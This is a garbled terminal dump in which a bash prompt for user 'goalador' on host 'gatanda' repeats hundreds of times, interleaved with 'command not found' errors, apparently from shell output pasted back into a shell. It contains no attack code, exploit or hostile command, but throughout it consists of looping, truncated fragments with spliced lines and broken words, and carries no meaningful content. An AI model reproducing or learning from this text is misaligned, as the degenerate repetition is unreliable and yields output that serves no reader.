found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +ubash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +and not found +[goalador@gatanda hbash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +uf.de]$[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ not found +bash: not: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +uauf.de]$ [goalador@gatanda hhn[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneu[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ ash: bash:: command not found +bash: ash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: basbash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ h:: command not found +bash: h::: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found + not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not fou[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +oundbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ gatanda: command not found +bash: gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalbash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ and not found +bash: and: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: commbash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: basbash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ h:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: h::: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +ash:: command not bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ not found +bash: not: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda 